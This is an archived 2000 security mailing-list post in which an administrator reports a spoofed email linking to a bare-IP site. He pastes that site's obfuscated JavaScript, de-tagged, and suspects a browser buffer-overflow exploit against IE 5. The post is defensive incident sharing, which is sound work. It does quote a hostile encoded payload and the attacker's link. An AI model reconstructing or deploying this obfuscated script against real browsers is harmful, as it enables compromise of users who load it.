Security Incidents mailing list archives

Hostile email

From: mmurray () TAOS COM (mmurray () TAOS COM)
Date: Wed, 12 Jul 2000 08:38:48 -0400


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey all...

        Got an email containing this this morning [Note: those were HTML tags;
I removed the tags around them, so that it's benign]:
a href="http://209.235.47.178/index.html"/a
a href="http://209.235.47.178/index.html"owwww! my
ass!/a___

        Just so that everybody knows, the subject line of the email is "Is this
Jim?", and it was BCC'd to me.  Sender was a yahoo.com email address with a
reply-to that was at aol.com.  I'm guessing that both were spoofed (although I
haven't bounced yet on either).  Never had a spoofed with a reply-to; seems
kinda strange.

        Went to the site, and it's a blank site except for a piece of
Javascript: (source follows, tags removed)

html
script src="_"

/script
script language="Javascript"

!--
function rm(){var
rmt="%%%%%%%%%NNNNN[[[[[NNNa%%%%%%%%%NNNN>[[[[[NNN^%%%%%%%%%NNNNC[[[[[NNNL%%%%%%
%%%NNNN][[[[[NNNW%%%%%%%%%NNNNr[[[[[NNNL%%%%%%%%%NNNNN[[[[[NNNI%%%%%%%%%NNNN#[[[
[[NNN^%%%%%%%%%NNNN9[[[[[NNNB%%%%%%%%%NNNN1[[[[[NNN/%%%%%%%%%NNNN~[[[[[NNN/%%%%%
%%%%NNNNr[[[[[NNNx%%%%%%%%%NNNNN[[[[[NNNN%%%%%%%%%NNNN][[[[[NNNU%%%%%%%%%NNNNP[[
[[[NNNh%%%%%%%%%NNNNr[[[[[NNNe%%%%%%%%%NNNNC[[[[[NNNU%%%%%%%%%NNNNN[[[[[NNNI%%%%
%%%%%NNNNP[[[[[NNN^%%%%%%%%%NNNN,[[[[[NNN\t%%%%%%%%%NNNNN[[[[[NNNU%%%%%%%%%NNNNr
[[[[[NNNT%%%%%%%%%NNNNf[[[[[NNN\t%%%%%%%%%NNNNC[[[[[NNNu%%%%%%%%%NNNNN[[[[[NNNB%
%%%%%%%%NNNNv[[[[[NNNx%%%%%%%%%NNNN7[[[[[NNN|%%%%%%%%%NNNNs[[[[[NNNt%%%%%%%%%NNN
N~[[[[[NNNh%%%%%%%%%NNNN9[[[[[NNNn%%%%%%%%%NNNN<[[{[[NNNU%%%%%%%%%NNNNN[[z[[NNN|
%%%%%%%%%NNNNc[[U[[NNNa%%%%%%%%%NNNN7[[n[[NNN^%%%%%%%%%NNNNP[[d[[NNNL%%%%%%%%%NN
NN,[[N[[NNNW%%%%%%%%%NNNNN[{z[[NNNL%%%%%%%%%NNNN+[+j[[NNNI%%%%%%%%%NNNN7[s&[[NNN
^%%%%%%%%%NNNNs[#U[[NNNB%%%%%%%%%NNNNN[X4[[NNN/%%%%%%%%%NNNN7[CU[[NNNP%%%%%%%%%N
NNN,[Nu[[NNNh%%%%%%%%%NNNN~[]B[[NNNL%%%%%%%%%NNNN`[sx[[NNN\t%%%%%%%%%NNNNN[)\n[[
NNNu%%%%%%%%%NNNNH[BS[[NNN&%%%%%%%%%NNNN;[xS[[NNNu%%%%%%%%%NNNNa[=F[[NNNd%%%%%%%
%[NNNNV[a([[NNNo%%%%%%%%[NNNN@[}+[[NNNL%%%%%%%%[NNNNN[L+[[NNNU%%%%%%%%[NNNNr[ex[
[NNNu%%%%%%%%[NN%N7[4?[[NNN/%%%%%%%%[NN{N9[x%[[NNN.%%%%%%%%[NN}N#[N{[[NNNu%%%%%%
%%[NN\tN`[^$[[NNN\t%%%%%%%%[NNWN<[&z[[NNNL%%%%%%%%[NNnN{[uU[[NNNI%%%%%%%%[NN?N$[
Un[[NNNu%%%%%%%%[NN%Nr[4d[[NNNh%%%%%%%%[NN[NP[4?[[NNNN%%%%%%%%[NN[Nr[t%[[NNNL%%%
%%%%%[NN[N~[h{[[NNNu%%%%%%%%[NN[NC[j$[[NNNI%%%%%%%%[NN[N?[B}[[NNN\t%%%%%%%%[NN[N
%[xL[[NNN.%%%%%%%%[NN[N{[de[[NNNx%%%%%%%%[NN[N$[\t4[[NNN?%%%%%%%%[NN[N}[^?[[NNN{
%%%%%%%%[NN[N\t[x[[[NNNt%%%%%%%%[NN[NW[N[[[NNNe%%%%%%%%[NN[Nn[h[[[NNNj%%%%%%%%[N
N[N?[U[[[NNNN%%%%%%%%[NN[N[{u[[[NNN^%%%%%%%%[NN[NN+\t[[[NNNu%%%%%%%%[NN[NNs^[[[N
NN&%%%%%%%%[NN[NN#t[[[NNNB%%%%%%%%[NN[NNX![[[NNNx%%%%%%%%[NN[NNC\t[[NNNN}%%%%%%%
%[NN[NN]?[[NNNNL%%%%%%%%[NN[NNCN[[NNNNL%%%%%%%%[NN[NNr%[[NNNNo%%%%%%%%[NN[NNN[[[
NNNNY%%%%%%%%[NN[NNs[[[NNNN$%%%%%%%%[NN[NN7[[[NNNN$%%%%%%%%[NN[NNv[[[NNNN|%%%%%%
%%[NN[NN][[[NNNN|%%%%%%%%[NN[NNB[[[NNNN|%%%%%%%%[NN[NNx[[[NNN%a%%%%%%%%[NN[NN;[[
[NNN{u%%%%%%%%[NN[NNS[[[NNNo\t%%%%%%%%[NN[NNS[[[NNN?!%%%%%%%%[NN[NN
[[[NNN-^%%%%%%%%[NN[NNx[[[NNNhU%%%%%%%%[NN[NNN[[[NNNz\\%%%%%%%%[NN[NNz[[[NNN^L%%
%%%%%%[NN[NNU[[[NNNoa%%%%%%%%[NN[NNu[[[NNN.&%%%%%%%%[NN[NNn[[[NNN{U%%%%%%%%[NN[[
N\t[[[NNN$e%%%%%%%%[NN[[Nu[[[NNNo$%%%%%%%%[NN[[NB[[[NNN?t%%%%%%%%[NN[[Nx[[[NNN{e
%%%%%%%%[NN[[NS[[[NNNzW%%%%%%%%[NN[[Nx[[[NNNuj%%%%%%%%[NN[[NN[[[NNN?\t%%%%%%%%[N
N[[Ne[[[NNN{^%%%%%%%%[NN[[NW[[[NNNo$%%%%%%%%[NN[[Nu[[[NNNN\t%%%%%%%%[NN[[Nj[[[NN
NWh%%%%%%%%[NN[[Nt[[[NNN4&%%%%%%%%[NN[[Nh[[[NNNtj%%%%%%%%[NN[[N}[[[NNNjI%%%%%%%%
[NN[[N\t[[[NNNhd%%%%%%%%[NN[[Nt[[[NNNBa%%%%%%%%[NN[[Nj[[[NNNxj%%%%%%%%[NN[[N}[[[
NNN&t%%%%%%%%[NN[[NL[[[NNN\t\\%%%%%%%%[NN[[NB[[[NNNhx%%%%%%%%[NN[[Nx[[[NNNLN%%%%
%%%%[NN[[NS[[[NNN\tW%%%%%%%%[NN[[Nx[[[NNNu4%%%%%%%%[NN[[NN[[[NNNxL%%%%%%%%[NN[[N
e[[[NNN?B%%%%%%%%[NN[[NW[[[NNN{x%%%%%%%%[NN[[Nu[[[NNNW|%%%%%%%%[NN[[[j[[[NNNN|%%
%%%%%%[NN[[[t[[[NNN}|%%%%%%%%[NN[[[h[[[NNNua%%%%%%%%[NN[[[|[[[NNN\ts%%%%%%%%[NN[
[[t[[[NNN\\\t%%%%%%%%[NN[[[n[[[NNNB!%%%%%%%%[NN[[[L[[[NNNx]%%%%%%%%[NN[[[}[[[NNN
}U%%%%%%%%[NN[[[B[[[NNNL\\%%%%%%%%[NN[[[x[[[NNNLL%%%%%%%%[NN[[[S[[[NNNoa%%%%%%%%
[NN[[[x[[[NNNY&%%%%%%%%[NN[[[?[[[NNN$U%%%%%%%%[NN[[[N[[[NNN$e%%%%%%%%[NNN[[[[[[N
NN|x%%%%%%%%[NNN[[[[[[NNN|N%%%%%%%%%NNN[[[[[[NNN|z%%%%%%%%{NNN[[[[[[NNNaU%%%%%%%
%}NNN[[[[[[NNNuu%%%%%%%%LNNN[[[[[[NNN\tn%%%%%%%%eNNN[[[[[[NNN!\t%%%%%%%%4NNN[[[[
[[NNN^u%%%%%%%%?NNN[[[[[[NNNUB%%%%%%%%NNNN[[[[[[NNN\\x%%%%%%%%NNNN[[[[[[NNNLS%%%
%%%%%NNNN[[[[[[NNNax%%%%%%%%NNNN[[[[[[NNN&N%%%%%%%%NNNN[[[[[[NNNU|%%%%%%%%NNNN[[
[[[[NNNet%%%%%%%%NNNN[[[[[[NNN$n%%%%%%%%NNNN[[[[[[NNN\tL%%%%%%%%NNNN[[[[[[NNNh}%
%%%%%%%NNNN[[[[[[NNNLB%%%%%%%%NNNN[[[[[[NNN\tx%%%%%%%%NNNN[[[[[[NNNu\"%%%%%%%%NN
NN[[[[[[NNNa\"%%%%%%%%NNNN[[[[[[NNN}x%%%%%%%%NNNN[[[[[[NNNLN%%%%%%%%NNNN[[[[[[NN
Ne}%%%%%%%%NNNN[[[[[[NNN4\t%%%%%%%%NNNN[[[[[[NNNxt%%%%%%%%NNNN[[[[[[NNNNj%%%%%%%
%NNNN[[[[[[NNNU}%%%%%%%%NNNN{[[[[[NNNhL%%%%%%%%NNNNr[[[[[NNNeB%%%%%%%%NNNNP[[[[[
NNNUx%%%%%%%%NNNNr[[[[[NNNI\"%%%%%%%%NNNN~[[[[[NNN^@%%%%%%%%NNNNC[[[[[NNN\tx%%%%
%%%%NNNN?[[[[[NNNU?%%%%%%%%NNNN,[[[[[NNNI{%%%%%%%%NNNN#[[[[[NNNL$%%%%%%%%NNNNX[[
[[[NNNBW%%%%%%%%NNNNC[[[[[NNNx?%%%%%%%%NNNN9[[[[[NNN^{%%%%%%%%NNNNN[[[[[NNN\t$%%
%%%%%%NNNNr[[[[[NNN4o%%%%%%%%NNNNf[[[[[NNN\\?%%%%%%%%NNNNC[[[[[",rmv=1,rms=966,r
mr=46;document.write((rmo)((rmt),(rms),(rmr),(rmv)));}(rm());
//--

/script
/html

        As I read this, it looks like it's designed to overflow a buffer in the
browser.  Best guess is that it exploits a vulnerability in IE 5, but I haven't
proved that yet (I'm currently on a Linux box that was NOT vulnerable).

        Anybody back me up on the theory?  Anybody else seen this?  Just thought
I'd put out a head's
up...

                                Mike

___________________________________________________________
Mike Murray                             mmurray () taos com
System and Network Administrator
Taos -- The Sys Admin Company
San Francisco, CA

pager: 415-253-2786

___________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.2

iQA/AwUBOWxm1R93UCkjW5r0EQJmLACg6HRpX6ftJNwSB69hhz4Ibm3/F3gAnRT5
NvjPz3NNZxupcNqcGMukm5P2
=Axih
-----END PGP SIGNATURE-----

Current thread:

Re: lifestages on IRC, (continued)
- - - Re: lifestages on IRC Robert van der Meulen (Jul 10)
    - Re: lifestages on IRC Vincent Hillier (Jul 10)
    - Re: lifestages on IRC T. H. Haymore (Jul 10)
- Re: scan log and subsequent response from the host's ISP Forrester, Mike (Jul 07)
  - tin.it and others non collaborative isps. Osvaldo Janeri Filho (Jul 07)
    - Re: tin.it and others non collaborative isps. Bradley Woodward (Jul 10)
    - Some stats of events Henri J. Schlereth (Jul 10)
    - Re: tin.it and others non collaborative isps. gabriel rosenkoetter (Jul 10)
    - Re: tin.it and others non collaborative isps. Philipp Buehler (Jul 11)
    - Re: tin.it and others non collaborative isps. Richard Bejtlich (Jul 11)
    - Hostile email mmurray () TAOS COM (Jul 12)
    - I Was rooted Andrew Heath (Jul 17)
    - Obfuscated URL's in spam Kee Hinckley (Jul 18)
    - 85.85.85.85 weirdness Wozz (Jul 18)
    - Re: 85.85.85.85 weirdness Pascal Bouchareine (Jul 19)
    - Re: 85.85.85.85 weirdness Wozz (Jul 19)
    - Re: 85.85.85.85 weirdness Jud (Jul 19)
    - msnhome.talkcity.com Dirk Koopman (Jul 21)
    - Re: msnhome.talkcity.com Ryan Yagatich (Jul 24)
    - Anyone ever heard of "rlumkaus" virus/bug/trojan/backdoor? Litscher, Steven (Jul 21)
    - Sudden increase in scans. Rune Kristian Viken (Jul 20)

(Thread continues...)